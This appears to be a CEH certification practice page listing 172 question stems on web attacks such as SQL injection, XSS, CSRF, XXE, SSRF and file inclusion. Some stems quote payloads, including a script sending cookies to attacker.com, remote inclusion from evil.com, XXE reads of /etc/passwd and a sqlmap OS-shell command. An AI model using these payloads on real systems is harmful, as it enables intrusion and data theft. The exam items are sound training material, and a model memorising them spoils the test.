Practice CEH Web Application and Injection Attacks questions with full explanations on every answer.
Web Application and Injection Attacks
1. A security analyst notices that the web application returns different response times when a valid username is submitted versus an invalid one during login. Which type of vulnerability is likely being exploited?
2. Which of the following tools is commonly used to automate the detection and exploitation of SQL injection vulnerabilities?
3. A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?
4. A web application allows users to upload profile pictures. An attacker uploads a file named "profile.php" containing malicious PHP code. When the attacker visits the uploaded file's URL, the code executes. Which vulnerability is being exploited?
5. An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?
6. During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?
7. Which of the following is the primary purpose of using a CSRF token in a web application?
8. A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?
9. Which Burp Suite tool is most appropriate for modifying and re-sending a single HTTP request multiple times with different payloads to test for SQL injection?
10. A penetration tester finds that a web application accepts XML input and returns the parsed data in the response. The tester submits the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which vulnerability is being exploited?
11. An attacker attempts to log into a web application by trying many common passwords for a list of known usernames. Which type of authentication attack is this?
12. A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?
13. Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?
14. A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?
15. Which TWO of the following are characteristics of stored (persistent) XSS?
16. A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?
17. Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?
18. A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?
19. A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?
20. Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?
21. A tester sends the following payload to a web application: %3Cscript%3Ealert('XSS')%3C/script%3E. The application echoes back the decoded payload in the response without sanitization. This behavior is typical of which type of vulnerability?
22. An attacker discovers that a web application's login form allows unlimited login attempts. The attacker uses a list of usernames and passwords obtained from a previous breach to gain access. This attack is known as:
23. A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?
24. An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:
25. Which of the following is a symptom of a successful command injection attack?
26. A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?
27. During an assessment, a tester discovers that the web application accepts XML input and returns the parsed data. The tester submits the following payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The response contains the contents of /etc/passwd. This vulnerability is known as:
28. Which TWO of the following are effective defenses against SQL injection attacks?
29. Which THREE of the following are common indicators of an ongoing brute-force attack against a web application?
30. Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?
31. A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?
32. Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?
33. During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?
34. A web application allows users to upload profile pictures. The application uses the filename provided by the user to save the file on the server. An attacker uploads a file named 'malicious.php%00.png' and the server saves it as 'malicious.php'. Which vulnerability is being exploited?
35. Which of the following is the BEST defense against brute-force attacks on a login form?
36. A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?
37. An attacker wants to perform a CSRF attack against a banking application. The application uses SameSite cookies set to 'Strict'. The attacker hosts a malicious page on their own domain. When the victim visits the malicious page, which of the following statements is TRUE regarding the CSRF attack?
38. A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?
39. During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?
40. Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?
41. A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?
42. An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?
43. Which TWO of the following are effective mitigations against Clickjacking attacks? (Choose 2)
44. Which THREE of the following are types of SQL injection attacks? (Choose 3)
45. Which TWO of the following are common tools used for web application security testing? (Choose 2)
46. A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?
47. Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?
48. During a web application penetration test, a tester submits a comment containing '<script>alert("XSS")</script>' and the script executes for all users who view the comment. Which type of cross-site scripting (XSS) vulnerability is present?
49. A web application uses a URL parameter to fetch a file from the server, e.g., 'download.php?file=report.pdf'. An attacker changes the parameter to '../../etc/passwd' and retrieves the password file. This attack is known as:
50. Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?
51. An attacker intercepts a request and notices that the server reflects the value of the 'User-Agent' header in the response without sanitization. The attacker crafts a payload that triggers an alert box. This is an example of:
52. In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?
53. A penetration tester finds that a web application allows uploading a file with the name '../../var/www/html/shell.php'. The file is successfully written to the server. Which combination of vulnerabilities does this exploit?
54. Which of the following best describes a Server-Side Request Forgery (SSRF) attack?
55. A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?
56. Which of the following is a common defense against clickjacking attacks?
57. A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?
58. Which TWO of the following are types of SQL injection? (Select 2)
59. Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)
60. Which TWO of the following attacks can be prevented by properly validating and sanitizing user input? (Select 2)
61. A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?
62. Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?
63. During a web application penetration test, a tester uses Burp Suite's Repeater tool to manually manipulate a request and observe the response. After sending the same request multiple times, the application returns a 302 redirect pointing to a login page. What is the MOST likely cause?
64. A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?
65. A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?
66. Which of the following is a primary purpose of the SameSite cookie attribute in mitigating CSRF attacks?
67. A penetration tester is using SQLMap to automate exploitation of a SQL injection vulnerability found in a login form. The tester wants to retrieve the names of all databases on the backend MySQL server. Which SQLMap flag should be used?
68. During a penetration test, the tester finds that the Apache server is configured with directory listing enabled on the /uploads directory. The tester navigates to http://example.com/uploads/ and sees a list of files. Which of the following is the MOST immediate security concern?
69. A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?
70. Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?
71. A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?
72. During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?
73. Which TWO of the following are effective defenses against CSRF attacks? (Choose 2.)
74. Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)
75. Which TWO of the following are valid techniques used in password spraying attacks? (Choose 2.)
76. A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?
77. Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities?
78. A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?
79. During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?
80. A web application allows users to access files using parameters like 'file=report.pdf'. A tester changes the parameter to '../../etc/passwd' and retrieves the system password file. This is an example of which attack?
81. A security team is implementing measures to prevent cross-site request forgery (CSRF) attacks. Which of the following is the most effective mitigation technique?
82. An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?
83. A web server is configured with WebDAV and allows PUT requests. An attacker uploads a .asp file and accesses it to execute code. Which tool or method is most directly associated with exploiting this misconfiguration?
84. A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?
85. An application is vulnerable to server-side request forgery (SSRF). An attacker exploits this to access internal services. Which of the following is a common indicator of SSRF?
86. Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user without needing to authenticate?
87. A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)
88. Which THREE of the following are common types of SQL injection attacks? (Select three)
89. An application uses the SameSite cookie attribute. Which TWO of the following are valid values for this attribute and their purposes? (Select two)
90. During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
91. A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?
92. During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?
93. Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?
94. A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?
95. A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?
96. A web server is found to have directory listing enabled for the /uploads folder. An attacker discovers a shell.php file uploaded earlier. Which attack is the attacker MOST likely to perform next?
97. A security team wants to test their web application for vulnerabilities. Which Burp Suite tool is BEST suited for automating attacks like brute-force or fuzzing?
98. A web application has an endpoint that takes a URL parameter and fetches content from that URL, returning it to the user. An attacker supplies 'file:///etc/passwd' and reads the server's passwd file. Which vulnerability is this?
99. Which of the following is a primary defense against SQL injection attacks?
100. An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?
101. A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?
102. A web application uses an XML parser to process user-supplied XML documents. An attacker submits the following payload: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>. Which vulnerability is being exploited?
103. Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)
104. Which TWO of the following are commonly used to mitigate SQL injection vulnerabilities? (Select 2)
105. Which THREE of the following are valid defenses against CSRF attacks? (Select 3)
106. During a web application penetration test, a security analyst intercepts a request using Burp Suite and notices the following parameter in the URL: /profile?user_id=123. By changing the user_id to 124, the analyst is able to view another user's profile. Which vulnerability is being exploited?
107. A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?
108. Which of the following tools is specifically designed to automate the exploitation of SQL injection vulnerabilities and retrieve data from databases?
109. A penetration tester identifies a web page that reflects user input in the response without proper encoding. The input is submitted via a GET parameter. Which type of cross-site scripting (XSS) is MOST likely present?
110. A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?
111. During a penetration test, you find a web application that includes files using a parameter like /index.php?page=about. When you change the parameter to /etc/passwd, the application returns the contents of the password file. Which vulnerability is present?
112. Which HTTP method is commonly used by WebDAV to upload files to a web server, and if misconfigured, could allow an attacker to upload malicious scripts?
113. A web application takes a URL from user input and fetches the content to display on the page. An attacker submits a URL pointing to an internal service like http://localhost:8080/admin. The server retrieves the internal resource and returns it. What is this attack?
114. Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?
115. A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?
116. After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?
117. A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?
118. Which TWO of the following are effective defenses against Cross-Site Request Forgery (CSRF) attacks? (Select 2)
119. Which THREE of the following are types of SQL injection attacks? (Select 3)
120. Which TWO of the following are common indicators of a command injection vulnerability? (Select 2)
121. A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?
122. During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?
123. Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?
124. An application allows users to upload XML files for processing. A tester uploads the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which attack is being performed?
125. A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?
126. Which of the following is a primary defense mechanism against Cross-Site Request Forgery (CSRF) attacks?
127. A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?
128. While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?
129. Which of the following describes a Server-Side Request Forgery (SSRF) attack?
130. A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?
131. An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?
132. A security analyst discovers that a web application's search box reflects user input without proper sanitization. However, the attacker must trick a victim into clicking a crafted link containing the malicious script. This vulnerability is classified as which type?
133. A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?
134. Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?
135. Which TWO of the following are common types of SQL injection attacks?
136. An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?
137. A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?
138. An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?
139. A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?
140. During a web application penetration test, a tester uses Burp Suite's Intruder tool to automate a series of login attempts using a list of common passwords. Which attack type is being performed?
141. An analyst reviews the following HTTP response: HTTP/1.1 200 OK Set-Cookie: sessionid=abc123; SameSite=None; Secure ... <html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?
142. Which of the following is the most effective defense against SQL injection attacks?
143. An attacker exploits an application by uploading a file that contains server-side script code, leading to arbitrary command execution on the web server. Which best describes this attack?
144. A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?
145. Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?
146. A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?
147. An attacker uses the following URL pattern to access files: http://example.com/../../etc/passwd. Which attack is being attempted?
148. Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF) attacks? (Select 2)
149. Which THREE of the following are common indicators of a Server-Side Request Forgery (SSRF) vulnerability? (Select 3)
150. Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)
151. A security analyst observes a web application returning database error messages containing table names and column names in the HTTP response. Which type of SQL injection is MOST likely being exploited?
152. During a web application test, a penetration tester intercepts a request using Burp Suite Proxy, modifies the 'Referer' header, and resends the request. The application processes the request despite the modified header. Which attack is the tester attempting to validate?
153. A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?
154. A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?
155. A security team deployed a web application firewall (WAF) that blocks requests containing SQL keywords like 'SELECT', 'UNION', and 'DROP'. An attacker bypasses the WAF by encoding the payload in base64 and using a SQL injection tool that decodes it server-side. Which mitigation would be MOST effective against this?
156. Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?
157. A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?
158. A web server running IIS 8.5 is found to have WebDAV enabled with write permissions. Which attack is MOST likely to be successful against this configuration?
159. An attacker crafts a link that, when clicked by an authenticated user, performs an unintended action on a web application where the user is logged in, such as changing their email address. The application uses a session cookie for authentication but does not include any anti-forgery tokens in forms. Which attack is this?
160. A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?
161. During a penetration test, a tester finds a web application that reflects user input in the page without sanitization. Which TWO types of XSS are potentially exploitable in this scenario?
162. An attacker is attempting to perform an Insecure Direct Object Reference (IDOR) attack on a web application. Which TWO conditions are necessary for this attack to succeed?
163. A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?
164. A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?
165. A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?
166. A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)
167. During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)
168. A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)
169. A penetration tester uses Burp Suite to intercept and modify web traffic. Which TWO features in Burp Suite would be MOST useful for performing a brute-force attack on a login form? (Choose TWO.)
170. A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)
171. A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)
172. During a web application test, the tester finds that the application includes user-supplied file names in include() statements. Which TWO of the following are indicators of a Remote File Inclusion (RFI) vulnerability? (Choose TWO.)
The Web Application and Injection Attacks domain covers the key concepts tested in this area of the CEH exam blueprint published by EC-Council. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all CEH domains — no account required.
The Courseiva CEH question bank contains 172 questions in the Web Application and Injection Attacks domain.
Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.
Yes — the session launcher on this page draws questions exclusively from the Web Application and Injection Attacks domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.